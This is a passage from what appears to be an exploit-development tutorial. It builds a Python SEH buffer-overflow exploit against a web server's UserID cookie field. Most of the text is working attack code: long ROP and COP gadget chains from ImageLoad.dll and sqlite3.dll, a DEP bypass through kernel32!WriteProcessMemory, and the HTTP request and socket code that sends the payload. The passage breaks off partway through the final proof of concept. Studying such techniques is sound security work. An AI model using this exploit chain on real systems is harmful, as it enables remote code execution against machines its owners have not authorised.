crash += struct.pack('<L', 0x1001c31e)		# add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)		# mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)		# sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)


# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only- no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)		# add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

Now that we have an updated PoC, let’s use a ROP routine to subtract this value from EAX.

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)		# pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)		# Negative distance to kernel32!WriteProcessMemory

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)		# add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)		# sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensation for retn 0x10 in previous ROP gadget

The above routine will do the following:

  1. Zero out EDX
  2. Place the offset into EBX
  3. Move the offset to EDX
  4. Subtract the offset from EDX and EAX- placing the result in EAX

The negative distance between the two kernel32.dll pointers is loaded into EBX.

The distance is then loaded into EDX.

Program execution then reaches the sub eax, edx instruction.

This allows us to successfully extract kernel32!WriteProcessMemory!

Perfect! All there is left to do now is use our arbitrary write primitive to overwrite the kernel32WriteProcessMemory parameter placeholder on the stack with the actual address of kernel32!WriteProcessMemory.

If you can recall, we already decremented ECX to make it contain the address of the parameter placeholder. However, the ROP gadget we will use for our arbitrary write, does so with ECX at an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.

crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

After we decrement ECX, we will use the arbitrary write gadget.

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the arbitrary write- and we can see we will be overwriting our parameter placeholder- as intended.

The arbitrary write occurs, and we have successfully dynamically placed our parameters on the stack!

Now that everything has been configured properly, the final goal is to kick off this function call. To do so, we will need to load the stack address which points to kernel32!WriteProcessMemory into ESP- and return into it.

Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes above the stack address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary write ROP gadget). This means we want to increase ECX to contain the address on the stack in question.

The goal now will be to:

  1. Set ECX equal to the stack address pointing to kernel32!WriteProcessMemory
  2. Load ECX into EAX
  3. Exchange EAX and ESP, then return into ESP

Our last ROP routine can solve this issue!

crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)		# mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)		# xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

Let’s also add some breakpoints to “mimic” shellcode- directly after the xchg eax, esp ROP gadget.


# NOPs before shellcode
crash += "\x90" * 230

# Breakpoints
crash += "\xCC" * 200

Running the updated PoC- we can see that the call to kernel32!WriteProcessMemory is complete- and that we have hit our breakpoints!

Here is the final PoC, with calc.exe shellcode.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)		# xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP- which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)		# pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)		# Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)		# sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)		# add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)		# mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)		# Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)		# add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)		# Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)		# Return address parameter placeholder (where function will jump to after execution- which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)		# hProccess = handle to current process (Psuedo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)		# lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cade in the .text seciton of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)		# lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)		# nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)		# lpNumberOfBytesWritten = writeable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)		# pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)		# Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)		# sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)		# pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)		# add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)		# mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)		# sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder

crash += struct.pack('<L', 0x1002248c)		# mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
